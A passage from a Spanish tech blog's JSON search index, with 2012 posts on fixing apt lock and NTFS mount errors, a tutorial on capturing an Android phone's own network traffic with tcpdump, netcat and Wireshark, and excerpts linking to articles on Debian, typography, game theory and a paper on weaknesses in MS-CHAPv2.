herramienta apt está instalando paquetes. Se abrirá en modo de sólo lectura, ¡se PERDERÁN todos los cambios que realice al estado de los paquetes!\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eEn realidad, lo que sucede es que \u003ccode\u003e/var/lock\u003c/code\u003e es un enlace simbólico que\napunta a \u003ccode\u003e/run/lock\u003c/code\u003e, que no existe, y de ahí que no lo encuentre.\nCreando el directorio en cuestión, se soluciona el problema:\u003c/p\u003e","title":"Solucionado el error \"No se pudo abrir el fichero de bloqueo «/var/lock/aptitude»\" al actualizar Raspbmc"},{"content":"Si intentamos montar un disco o partición en NTFS, el formato que utiliza Windows, que no ha sido desconectada \u0026ldquo;de forma segura\u0026rdquo;, es posible que no podamos montarla y que recibamos el siguiente error:\n$ sudo mount -t ntfs-3g /dev/sdb1 /media/ntfs $MFTMirr does not match $MFT (record 0). Failed to mount \u0026#39;/dev/sdb1\u0026#39;: Error de entrada/salida NTFS is either inconsistent, or there is a hardware fault, or it’s a SoftRAID/FakeRAID hardware. In the first case run chkdsk /f on Windows then reboot into Windows twice. The usage of the /f parameter is very important! If the device is a SoftRAID/FakeRAID then first activate it and mount a different device under the /dev/mapper/ directory, (e.g. /dev/mapper/nvidia_eahaabcc1). Please see the \u0026#39;dmraid\u0026#39; documentation for more details. Incluso si utilizamos el parámetro -o force nos sigue devolviendo el mismo error.\nAfortunadamente, existe el paquete ntfsprogs, disponible en los repositorios, que incluye una herramienta con la que podemos solucionarlo:\n$ sudo ntfsfix /dev/sdb1 Mounting volume... $MFTMirr does not match $MFT (record 0). FAILED Attempting to correct errors... Processing $MFT and $MFTMirr... Reading $MFT... OK Reading $MFTMirr... OK Comparing $MFTMirr to $MFT... FAILED Correcting differences in $MFTMirr record 0...OK Processing of $MFT and $MFTMirr completed successfully. Setting required flags on partition... OK Going to empty the journal ($LogFile)... OK Checking the alternate boot sector... FIXED NTFS volume version is 3.1. NTFS partition /dev/sdb1 was processed successfully. Y ahora ya sí podremos montarla normalmente.\nEl paquete ntfsprogs incluye, además, herramientas para realizar todo tipo de acciones sobre volúmenes NTFS: crear, clonar, comparar, comprobar, redimensionar, desfragmentar, mostrar información de ficheros, listar directorios, deshacer el borrado de ficheros, etc.\nReferencias » How to fix \u0026lsquo;$MFTMirr does not match $MFT (record 0)\u0026rsquo;\n","permalink":"http://karpoke.ignaciocano.com/2012/09/06/solucionado-el-error-mftmirr-does-not-match-mft-record-0-al-montar-una-particion-ntfs/","summary":"\u003cp\u003eSi intentamos montar un disco o partición en NTFS, el formato que\nutiliza Windows, que no ha sido desconectada \u0026ldquo;de forma segura\u0026rdquo;, es\nposible que no podamos montarla y que recibamos el siguiente error:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ sudo mount -t ntfs-3g /dev/sdb1 /media/ntfs\n$MFTMirr does not match $MFT (record 0).\n    Failed to mount \u0026#39;/dev/sdb1\u0026#39;: Error de entrada/salida\n    NTFS is either inconsistent, or there is a hardware fault, or it’s a\n    SoftRAID/FakeRAID hardware. In the first case run chkdsk /f on Windows\n    then reboot into Windows twice. The usage of the /f parameter is very\n    important! If the device is a SoftRAID/FakeRAID then first activate\n    it and mount a different device under the /dev/mapper/ directory, (e.g.\n    /dev/mapper/nvidia_eahaabcc1). Please see the \u0026#39;dmraid\u0026#39; documentation\n    for more details.\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eIncluso si utilizamos el parámetro \u003ccode\u003e-o force\u003c/code\u003e nos sigue devolviendo el\nmismo error.\u003c/p\u003e","title":"Solucionado el error \"$MFTMirr does not match $MFT (record 0).\" al montar una partición NTFS"},{"content":" Without open source, Twitter wouldn’t exist. Every Tweet you send and receive touches open source software on its journey between computers and mobile devices. We were curious about how much open source is used at Twitter. Beyond that, we wanted to discover how open source may influence the culture at Twitter, Inc.\nWe asked Chris Aniszczyk, Open Source Manager at Twitter, to share the company’s open source story. Aniszczyk will be keynoting at this month’s LinuxCon, August 29 through 31, in San Diego, CA. His topic: The open source technology behind a Tweet.\n» Jason Hibbets | opensource.com\n","permalink":"http://karpoke.ignaciocano.com/2012/09/01/the-open-source-technology-behind-twitter/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWithout open source, Twitter wouldn’t exist. Every Tweet you send and\nreceive touches open source software on its journey between computers\nand mobile devices. We were curious about how much open source is used\nat Twitter. Beyond that, we wanted to discover how open source may\ninfluence the culture at Twitter, Inc.\u003c/p\u003e\n\u003cp\u003eWe asked Chris Aniszczyk, Open Source Manager at Twitter, to share the\ncompany’s open source story. Aniszczyk will be keynoting at this\nmonth’s LinuxCon, August 29 through 31, in San Diego, CA. His topic:\nThe open source technology behind a Tweet.\u003c/p\u003e","title":"The open source technology behind Twitter"},{"content":" Hace año y medio que recopilé datos sobre la distribución de la propiedad de los medios de comunicación, compilando esos datos en un solo gráfico: los dueños de la información.\nParece que el gráfico tuvo buena acogida y a mucha gente le pareció interesante. A mí, al menos, me parece útil. Una herramienta para tener presente, cuando consultamos algún medio de comunicación, a qué intereses sirve. Así que me puse manos a la obra, recopilando datos de los movimientos empresariales en el sector, para poder mostraros un nuevo gráfico, ampliado, corregido y actualizado.\n» Mendigo | esmola.wordpress.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/31/los-duenos-de-la-informacion-ii/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHace año y medio que recopilé datos sobre la distribución de la\npropiedad de los medios de comunicación, compilando esos datos en un\nsolo gráfico: los dueños de la información.\u003c/p\u003e\n\u003cp\u003eParece que el gráfico tuvo buena acogida y a mucha gente le pareció\ninteresante. A mí, al menos, me parece útil. Una herramienta para\ntener presente, cuando consultamos algún medio de comunicación, a qué\nintereses sirve. Así que me puse manos a la obra, recopilando datos de\nlos movimientos empresariales en el sector, para poder mostraros un\nnuevo gráfico, ampliado, corregido y actualizado.\u003c/p\u003e","title":"Los dueños de la información II"},{"content":" Watch me jam solo, then use the special interactive player to record your own remix. Go ahead, show me what you got!\nVer vídeo\n» Terry Crews | vimeo.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/31/old-spice-muscle-music/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWatch me jam solo, then use the special interactive player to record\nyour own remix. Go ahead, show me what you got!\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003ca href=\"http://player.vimeo.com/video/47875656\"\u003eVer vídeo\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003e» Terry Crews | \u003ca href=\"http://vimeo.com/47875656\"\u003evimeo.com\u003c/a\u003e\u003c/p\u003e","title":"Old Spice Muscle Music"},{"content":" Paper Biped Robot making process from H/P MPM (Mechanical Paper Model) http://www.geocities.jp/kikousya290821/newmpm.htm All paper made Biped Robot without wooden shafts and elastic band as power source\n» geocities.jp/kikousya290821 | via microsiervos.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/30/walking-paper/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePaper Biped Robot making process from H/P MPM (Mechanical Paper\nModel)\n\u003ca href=\"http://www.geocities.jp/kikousya290821/newmpm.htm\"\u003ehttp://www.geocities.jp/kikousya290821/newmpm.htm\u003c/a\u003e\nAll paper made Biped Robot without wooden shafts and elastic band as\npower source\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/Jx7nS7_Kf7E?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» \u003ca href=\"http://www.geocities.jp/kikousya290821/newmpm.htm\"\u003egeocities.jp/kikousya290821\u003c/a\u003e | via \u003ca href=\"http://www.microsiervos.com/archivo/juegos-y-diversion/robot-de-papel.html\"\u003emicrosiervos.com\u003c/a\u003e\u003c/p\u003e","title":"Walking paper"},{"content":" Back in 1998 when Times New Roman was still widely used on the web, my then boss made sure we always designed our web sites with Arial, as she hated the look of serif fonts on the web. Was it the case that sans serif fonts were more legible, or was it just a matter of taste?\nIn 2003 as part of my master’s degree I reviewed over 50 empirical studies in typography and found a definitive answer.\nAn argument has been raging for decades within the scientific and typographic communities on what seems a very insignificant issue: Do serifs contribute to the legibility of typefaces, and by definition, are sans serif typefaces less legible? To date, no one has managed to provide a conclusive answer to this issue.\n» Alex Poole | alexpoole.info\n","permalink":"http://karpoke.ignaciocano.com/2012/08/27/which-are-more-legible-serif-or-sans-serif-typefaces/","summary":"\u003cblockquote\u003e\n\u003cp\u003eBack in 1998 when Times New Roman was still widely used on the web, my\nthen boss made sure we always designed our web sites with Arial, as\nshe hated the look of serif fonts on the web. Was it the case that\nsans serif fonts were more legible, or was it just a matter of taste?\u003c/p\u003e\n\u003cp\u003eIn 2003 as part of my master’s degree I reviewed over 50 empirical\nstudies in typography and found a definitive answer.\u003c/p\u003e","title":"Which Are More Legible: Serif or Sans Serif Typefaces?"},{"content":" Since 2004, I’ve owned a ThinkPad A22m - a laptop that came out in 2001. Much to the dismay of certain friends, I still feel no need to purchase a newer computer. I’ve often said that this old hardware can do everything I need while still letting me run modern software. However, it now seems like I will have to take some responsibility for the code if I want that to still be true in the future.\nSpecifically, I am talking about open source ATI drivers on GNU / Linux. The four main video card lines released by ATI (now owned by AMD) have been Wonder, Mach, Rage and Radeon. I don’t think Wonder cards have any features that would warrant the development of a dedicated driver but Linux drivers for the other three have been written.\nThe Radeon driver is actively maintained by software engineers at AMD and some people who work for other software companies. The other two? Not so much. The Rage 128 driver was especially in need of a major update recently. And since my computer has a Rage Mobility graphics card, I felt motivated to start working on the code even though I had never hacked such a low-level piece of software before. Since the effort has largely succeeded, I would like to share my experiences with editing an open source video driver. The learning curve was quite steep and when I first started reading documentation, it seemed like it was written for a different audience. This post is going to be an unadultered attempt to get a completely new reader to catch on to what I did. I’m sure I will later find out that many things written in this post are technically incorrect, but I will not edit them. I want the only knowledge communicated in this piece to be the knowledge that one might reasonably be expected to have after jumping into driver development for the first time.\n» Connor Classen Behan | smallperturbation.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/26/tales-of-a-first-time-driver-developer/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSince 2004, I’ve owned a ThinkPad A22m - a laptop that came out in\n2001. Much to the dismay of certain friends, I still feel no need to\npurchase a newer computer. I’ve often said that this old hardware can\ndo everything I need while still letting me run modern software.\nHowever, it now seems like I will have to take some responsibility for\nthe code if I want that to still be true in the future.\u003c/p\u003e","title":"Tales Of A First Time Driver Developer"},{"content":" Debian is the most influential Linux distribution ever. Of the 305 active distributions listed on Distrowatch, 147 are derived from Debian, and 87 from Ubuntu, Debian’s most famous off-shoot. In other words, 77% of the distributions being used today wouldn’t exist without Debian. That makes Debian’s nineteenth anniversary on August 16 worth a moment’s reflection, not just technologically, but socially as well.\nFor me, Debian and free software are hopelessly intertwined. While I had played about with Linux before, I only went hardcore when I started work on 5 July, 1999 at Stormix Technologies, an ultimately unsuccessful attempt to commercialize Debian. From there, I jumped ship to work at Progeny Linux System, which was founded by Ian Murdock and funded by Bruce Perens’ short-lived Linux Capital Group, and very much traded on the reputation of the two Debian leaders behind it.\nIn those few years, I worked with some of Debian’s leading developers, including Branden Robinson, John Goerzen, and Jeff Licquia, and at conferences stumbled across most of the mover and shakers in free and open source software as well. In short, my introduction to free software was also my introduction to Debian.\n» Bruce Byfield | linux-magazine.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/25/debian-and-i/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDebian is the most influential Linux distribution ever. Of the 305\nactive distributions listed on Distrowatch, 147 are derived from\nDebian, and 87 from Ubuntu, Debian’s most famous off-shoot. In other\nwords, 77% of the distributions being used today wouldn’t exist\nwithout Debian. That makes Debian’s nineteenth anniversary on August\n16 worth a moment’s reflection, not just technologically, but socially\nas well.\u003c/p\u003e\n\u003cp\u003eFor me, Debian and free software are hopelessly intertwined. While I\nhad played about with Linux before, I only went hardcore when I\nstarted work on 5 July, 1999 at Stormix Technologies, an ultimately\nunsuccessful attempt to commercialize Debian. From there, I jumped\nship to work at Progeny Linux System, which was founded by Ian Murdock\nand funded by Bruce Perens’ short-lived Linux Capital Group, and very\nmuch traded on the reputation of the two Debian leaders behind it.\u003c/p\u003e","title":"Debian and I"},{"content":" Desde el punto de vista del usuario ¿Se puede tener una plataforma Android basada exclusivamente en Software Libre? Este es mi análisis tras una experiencia de seis meses de uso.\n» Pablo Hinojosa | osl.ugr.es\n","permalink":"http://karpoke.ignaciocano.com/2012/08/24/es-posible-tener-un-smartphone-completamente-libre/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDesde el punto de vista del usuario ¿Se puede tener una plataforma\nAndroid basada exclusivamente en Software Libre? Este es mi análisis\ntras una experiencia de seis meses de uso.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Pablo Hinojosa | \u003ca href=\"http://osl.ugr.es/2012/08/23/telefono-libre-informe/\"\u003eosl.ugr.es\u003c/a\u003e\u003c/p\u003e","title":"¿Es posible tener un smartphone completamente libre?"},{"content":" Our investigation focuses on Microsoft proprietary protocols with the help of a network trace and references. The steps that will be covered are specific to authentication view (MS-Chapv2), key derivation for encryption and the algorithm of the compression feature (MPPE/MPPC). Finally, to complete our approach, we will illustrate weaknesses through a new forensic tool dedicated to these protocols.\nMainline :\nDetails on MSChap-v2 : The first chapter aims to understand how the authentication protocol works ; Overview of MPPE protocol : We explain briefly the encryption protocol ; Overview of MPPC protocol : Here, we take a look at the compression feature ; Decipher MPPE by breaking MSCHAP-v2 : We decipher MPPE protocol with the help of MSChap-v2;\n» Moxie Marlinspike | esec-pentest.sogeti.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/20/decipher-mppe-by-breaking-ms-chap-v2/","summary":"\u003cblockquote\u003e\n\u003cp\u003eOur investigation focuses on Microsoft proprietary protocols with the\nhelp of a network trace and references. The steps that will be covered\nare specific to authentication view (MS-Chapv2), key derivation for\nencryption and the algorithm of the compression feature (MPPE/MPPC).\nFinally, to complete our approach, we will illustrate weaknesses\nthrough a new forensic tool dedicated to these protocols.\u003c/p\u003e\n\u003cp\u003eMainline :\u003c/p\u003e\n\u003cp\u003eDetails on MSChap-v2 : The first chapter aims to understand how the\nauthentication protocol works ;\nOverview of MPPE protocol : We explain briefly the encryption\nprotocol ;\nOverview of MPPC protocol : Here, we take a look at the compression\nfeature ;\nDecipher MPPE by breaking MSCHAP-v2 : We decipher MPPE protocol with\nthe help of MSChap-v2;\u003c/p\u003e","title":"Decipher MPPE by breaking MS-CHAP v2"},{"content":" This is an animated, color, ANSI-text telnet server that renders a loop of the classic Nyan Cat animation.\nOpen up a supported terminal and run:\ntelnet miku.acm.uiuc.edu\n» Kevin Lange | miku.acm.uiuc.edu\n","permalink":"http://karpoke.ignaciocano.com/2012/08/20/nyan-cat-telnet-server/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis is an animated, color, ANSI-text telnet server that renders a\nloop of the classic Nyan Cat animation.\u003c/p\u003e\n\u003cp\u003eOpen up a supported terminal and run:\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003etelnet miku.acm.uiuc.edu\u003c/code\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Kevin Lange | \u003ca href=\"http://miku.acm.uiuc.edu/\"\u003emiku.acm.uiuc.edu\u003c/a\u003e\u003c/p\u003e","title":"Nyan Cat Telnet Server"},{"content":" If you want to learn a thing or two about color, why not look to the true masters whose artistic work has stood the test of time? Great painters almost always possess a keen understanding of color that is truly impressive when you stop to appreciate it.\n» Joshua Johnson | designshack.net\n","permalink":"http://karpoke.ignaciocano.com/2012/08/20/10-free-color-palettes-from-10-famous-paintings/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIf you want to learn a thing or two about color, why not look to the\ntrue masters whose artistic work has stood the test of time? Great\npainters almost always possess a keen understanding of color that is\ntruly impressive when you stop to appreciate it.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Joshua Johnson | \u003ca href=\"http://designshack.net/articles/inspiration/10-free-color-palettes-from-10-famous-paintings/\"\u003edesignshack.net\u003c/a\u003e\u003c/p\u003e","title":"10 Free Color Palettes From 10 Famous Paintings"},{"content":"Si necesitamos analizar el tráfico de red de nuestro Android, ya sea para depurar una aplicación o para ver qué uso de la red hacen las aplicaciones instaladas en el terminal, podemos recurrir a herramientas bien conocidas como tcpdump, netcat y Wireshark.\nAntes de empezar Antes de continuar, deberemos tener instaladas las herramientas de desarrollo para Android. Descargamos el paquete y lo descomprimimos:\n$ wget http://dl.google.com/android/android-sdk_r20.0.3-linux.tgz $ tar xvzf android-sdk_r20.0.3-linux.tgz Añadimos los directorios tools y platform-tools al PATH. Ejecutamos las siguientes líneas, y las añadimos también en el fichero ~/.bashrc, para incluirlas en el PATH del sistema:\nexport ANDROID_HOME=$HOME/android-sdk-linux export PATH=$PATH:$ANDROID_HOME/tools:$ANDROID_HOME/platform-tools Abrimos el gestor de paquetes ejecutando:\n$ android sdk Instalaremos las SDK Tools y las SDK Platform-tools.\nInstalando tcpdump en Android Utilizaremos una versión de tcpdump que ha sido compilada para ARM. La podemos descargar de aquí tcpdump-arm:\n$ wget http://www.eecs.umich.edu/~timuralp/tcpdump-arm Ahora activaremos el modo depuración. En Android 4.0.3 se encuentra en el menú Ajustes \u0026gt; Opciones del desarrollador \u0026gt; Depuración de USB. En otras versiones puede variar ligeramente. Si no nos aparece esta opción, podemos probar pulsando 7 veces en el campo Build del menú Ajustes \u0026gt; Información. Acto seguido, conectamos el móvil a nuestro equipo mediante el cable USB.\nSi todo ha ido bien, podremos listar los dispositivos conectados ejecutando:\n$ adb devices List of devices attached 192B32A8955D29F device Enviamos la versión de tcpdump que hemos descargado al móvil y le cambiamos los permisos:\n$ adb push tcpdump-arm /data/local $ adb shell shell@android:/ $ cd /data/local shell@android:/data/local $ chmod 777 tcpdump-arm shell@android:/data/local $ su 1|shell@android:/data/local # ./tcpdump-arm -h tcpdump-arm version 4.0.0 libpcap version 1.0.0 Usage: tcpdump-arm [-aAdDefIKlLnNOpqRStuUvxX] [ -B size ] [ -c count ] [ -C file_size ] [ -E algo:secret ] [ -F file ] [ -G seconds ] [ -i interface ] [ -M secret ] [ -r file ] [ -s snaplen ] [ -T type ] [ -w file ] [ -W filecount ] [ -y datalinktype ] [ -z command ] [ -Z user ] [ expression ] Un ejemplo de captura de tráfico:\nshell@android:/data/local # ./tcpdump-arm -n -i wlan0 -p -s 0 -w out.pcap El argumento -n es para evitar traducir IPs a nombres, -i especifica la interfaz de red, -p indica que no sea en modo promiscuo, dado que de todas formas no iba a funcionar, -s 0 es para que capture todo el paquete desde el primer byte y -w envía la salida a un fichero.\nCuando queramos parar, matamos el proceso con ^C y nos traemos el fichero de la captura, que podremos abrir con Wireshark:\n$ adb pull /data/local/out.pcap Actualizado el 20 de enero de 2014 Me he encontrado algún caso en el que al intentar ejecutar netcat, nos devuelve el siguiente error:\n$ adb shell ~ # nc /sbin/sh: nc: not found En este caso, podemos utilizar la versión que trae alguna aplicación, como por ejemplo SSH Droid:\n~ # alias nc=\u0026#34;/data/data/berserker.android.apps.sshdroid/home/bin/nc\u0026#34; Otra opción podría ser utilizar BusyBox:\n~ # find . -name busybox ./system/xbin/busybox ~ # alias nc=\u0026#34;/system/xbin/busybox nc\u0026#34; # debemos pasar el nombre del comando Analizar el tráfico en tiempo real Guardar el tráfico en un fichero para luego examinarlo puede estar bien en algunos casos, pero poder analizar en tiempo real también suena interesante. Lo que haremos será abrir una conexión entre el móvil y nuestro equipo mediante netcat, y pasar la salida de tcpdump a través de ella directamente hacia Wireshark.\n$ adb shell shell@android:/ $ su shell@android:/ # /data/local/tcpdump-arm -n -s 0 -i wlan0 -w - | nc -l -p 12345 O en un solo comando:\n$ adb shell \u0026#34;su -c \u0026#39;/data/local/tcpdump-arm -n -s 0 -i wlan0 -w - | nc -l -p 12345\u0026#39;\u0026#34; En nuestro equipo, creamos una redirección de un puerto en el móvil, el puerto en el que hemos lanzado netcat como servidor, a un puerto de nuestro equipo:\n$ adb forward tcp:12345 tcp:12345 Y utilizando netcat como cliente, pasamos su salida a Wireshark:\n$ nc 127.0.0.1 12345 | wireshark -k -S -i - Actualizado el 22 de julio de 2014 Si usamos ADB sobre red no es necesario que conectemos el móvil al ordenar por USB. Basta activar el modo de depuración y ejecutar:\n$ adb connect 192.168.1.51:5555 Referencias » Analyzing Android Network Traffic » Android: Binary solo » Android Developer Tools » Cross Compiling on Linux\n","permalink":"http://karpoke.ignaciocano.com/2012/08/20/analizando-el-trafico-de-red-en-android-con-tcpdump-netcat-y-wireshark/","summary":"\u003cp\u003eSi necesitamos analizar el tráfico de red de nuestro Android, ya sea\npara depurar una aplicación o para ver qué uso de la red hacen las\naplicaciones instaladas en el terminal, podemos recurrir a herramientas\nbien conocidas como \u003ccode\u003etcpdump\u003c/code\u003e, \u003ccode\u003enetcat\u003c/code\u003e y Wireshark.\u003c/p\u003e\n\u003ch2 id=\"antes-de-empezar\"\u003eAntes de empezar\u003c/h2\u003e\n\u003cp\u003eAntes de continuar, deberemos tener instaladas las \u003ca href=\"http://developer.android.com/tools/index.html\"\u003eherramientas de\ndesarrollo para Android\u003c/a\u003e. Descargamos el paquete y lo descomprimimos:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ wget http://dl.google.com/android/android-sdk_r20.0.3-linux.tgz\n$ tar xvzf android-sdk_r20.0.3-linux.tgz\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eAñadimos los directorios \u003ccode\u003etools\u003c/code\u003e y \u003ccode\u003eplatform-tools\u003c/code\u003e al \u003ccode\u003ePATH\u003c/code\u003e.\nEjecutamos las siguientes líneas, y las añadimos también en el fichero\n\u003ccode\u003e~/.bashrc\u003c/code\u003e, para incluirlas en el PATH del sistema:\u003c/p\u003e","title":"Analizando el tráfico de red en Android con tcpdump, netcat y Wireshark"},{"content":" The world of game theory is currently on fire. In May, Freeman Dyson at Princeton University and William Press at the University of Texas announced that they had discovered a previously unknown strategy for the game of prisoner’s dilemma which guarantees one player a better outcome than the other.\nThat’s a monumental surprise. Theorists have studied Prisoner’s Dilemma for decades, using it as a model for the emergence of co-operation in nature. This work has had a profound impact on disciplines such as economics, evolutionary biology and, of course, game theory itself. The new result will have impact in all these areas and more.\nThe game is this: imagine Alice and Bob have committed a crime and are arrested. The police offer each one a deal\u0026ndash;snitch and you go free while your friend does 6 months in jail. If both Alice and Bob snitch, they both get 3 months in jail. If they both remain silent, they both get one month in jail for a lesser offence.\nWhat should Alice and Bob do?\n» technologyreview.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/20/the-emerging-revolution-in-game-theory/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe world of game theory is currently on fire. In May, Freeman Dyson\nat Princeton University and William Press at the University of Texas\nannounced that they had discovered a previously unknown strategy for\nthe game of prisoner’s dilemma which guarantees one player a better\noutcome than the other.\u003c/p\u003e\n\u003cp\u003eThat’s a monumental surprise. Theorists have studied Prisoner’s\nDilemma for decades, using it as a model for the emergence of\nco-operation in nature. This work has had a profound impact on\ndisciplines such as economics, evolutionary biology and, of course,\ngame theory itself. The new result will have impact in all these areas\nand more.\u003c/p\u003e","title":"The Emerging Revolution in Game Theory"},{"content":" El pasado martes, Mercadona retiró 11 productos cosméticos después de una evaluación realizada por la Agencia Española de Medicamentos y Productos Sanitarios. Ayer, esa misma agencia publicó un comunicado explicando que el problema era de orden administrativo y no existía ningún peligro para la salud de los consumidores.\nMe parece un buen momento para que hablemos del verdadero problema de fondo. La industria cosmética se sostiene sobre una mentira: hacer creer a sus clientes que la eficacia de sus productos tiene una base científica.\n» alberto | principiamarsupia.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/17/el-gran-fraude-de-los-cosmeticos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl pasado martes, Mercadona retiró 11 productos cosméticos después de\nuna evaluación realizada por la Agencia Española de Medicamentos y\nProductos Sanitarios. Ayer, esa misma agencia publicó un comunicado\nexplicando que el problema era de orden administrativo y no existía\nningún peligro para la salud de los consumidores.\u003c/p\u003e\n\u003cp\u003eMe parece un buen momento para que hablemos del verdadero problema de\nfondo. La industria cosmética se sostiene sobre una mentira: hacer\ncreer a sus clientes que la eficacia de sus productos tiene una base\ncientífica.\u003c/p\u003e","title":"El gran fraude de los cosméticos"},{"content":" Fellow Linuxers,\nThis is just to announce the imminent completion of a brand-new Linux release, which I’m calling the Debian Linux Release. This is a release that I have put together basically from scratch; in other words, I didn’t simply make some changes to SLS and call it a new release. I was inspired to put together this release after running SLS and generally being dissatisfied with much of it, and after much altering of SLS I decided that it would be easier to start from scratch. The base system is now virtually complete (though I’m still looking around to make sure that I grabbed the most recent sources for everything), and I’d like to get some feedback before I add the ”fancy” stuff.\n» Ian A Murdock | comp.os.linux.development\n","permalink":"http://karpoke.ignaciocano.com/2012/08/17/new-release-under-development-suggestions-requested/","summary":"\u003cblockquote\u003e\n\u003cp\u003eFellow Linuxers,\u003c/p\u003e\n\u003cp\u003eThis is just to announce the imminent completion of a brand-new Linux\nrelease,\nwhich I’m calling the Debian Linux Release. This is a release that I\nhave put\ntogether basically from scratch; in other words, I didn’t simply make\nsome\nchanges to SLS and call it a new release. I was inspired to put\ntogether this\nrelease after running SLS and generally being dissatisfied with much\nof it,\nand after much altering of SLS I decided that it would be easier to\nstart\nfrom scratch. The base system is now virtually complete (though I’m\nstill\nlooking around to make sure that I grabbed the most recent sources\nfor\neverything), and I’d like to get some feedback before I add the\n”fancy” stuff.\u003c/p\u003e","title":"New release under development; suggestions requested"},{"content":" I run FreeBSD on my computers. A lot of my friends run Linux, or at least one of the distributions of it. Naturally, then, we agree that a Unix-style operating system is the right choice, but we disagree on which to use.\nIt’s been my impression that the BSD communit{y,ies}, in general, understand Linux far better than the Linux communit{y,ies} understand BSD. I have a few theories on why that is, but that’s not really relevant. I think a lot of Linux people get turned off BSD because they don’t really understand how and why it’s put together. Thus, this rant; as a BSD person, I want to try to explain how BSD works in a way that Linux people can absorb.\nWhile there’s overwhelming similarity between the operating systems in most cases, there are also a lot of differences. As you probe more into the differences, you find that they emerge from deep-seated disagreements. Some are disagreements over development methodology, some over deployment and usage, some about what’s important, some about who’s important, and some about which flavor of ice cream is superior. Just comparing the surface differences doesn’t tell you anything; it’s the deeper differences that both explain and justify why each group does things the way they do.\n» Matthew D. Fuller | over-yonder.net/~fullermd\n","permalink":"http://karpoke.ignaciocano.com/2012/08/15/bsd-vs-linux/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI run FreeBSD on my computers. A lot of my friends run Linux, or at\nleast one of the distributions of it. Naturally, then, we agree that a\nUnix-style operating system is the right choice, but we disagree on\nwhich to use.\u003c/p\u003e\n\u003cp\u003eIt’s been my impression that the BSD communit{y,ies}, in general,\nunderstand Linux far better than the Linux communit{y,ies} understand\nBSD. I have a few theories on why that is, but that’s not really\nrelevant. I think a lot of Linux people get turned off BSD because\nthey don’t really understand how and why it’s put together. Thus, this\nrant; as a BSD person, I want to try to explain how BSD works in a way\nthat Linux people can absorb.\u003c/p\u003e","title":"BSD vs Linux"},{"content":" A compilation of classic arcade deaths, arranged to an 8-bit cover of ”Mad World”.\nThe music is a cover of Mad World, by Tears for Fears.\n» Rob Beschizza | boingboing.net\n","permalink":"http://karpoke.ignaciocano.com/2012/08/15/game-deaths/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA compilation of classic arcade deaths, arranged to an 8-bit cover of\n”Mad World”.\u003c/p\u003e\n\u003cp\u003eThe music is a cover of Mad World, by Tears for Fears.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/gJ6APKIjFQY?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» Rob Beschizza | \u003ca href=\"http://boingboing.net/2011/03/25/classic-arcade-game-1.html\"\u003eboingboing.net\u003c/a\u003e\u003c/p\u003e","title":"Game deaths"},{"content":" Much of this data was entered by hand (obtained by contacting past conference organizers, retrieving cached conference websites, and searching CVs) so please email me if you notice any errors or omissions: bestpaper-AT-jeffhuang.com. I tried to collect best paper awards from the top-tier conferences in each area, but some conferences do not have such an award (e.g. SIGGRAPH, CAV). ”Distinguished paper award” and ”outstanding paper award” are included but not ”best student paper” (e.g. NIPS) or ”best 10-year old paper” (e.g. POPL)\n» Jeff Huang | jeffhuang.com\n","permalink":"http://karpoke.ignaciocano.com/2012/08/15/best-paper-awards-in-computer-science-since-1996/","summary":"\u003cblockquote\u003e\n\u003cp\u003eMuch of this data was entered by hand (obtained by contacting past\nconference organizers, retrieving cached conference websites, and\nsearching CVs) so please email me if you notice any errors or\nomissions: bestpaper-AT-jeffhuang.com. I tried to collect best 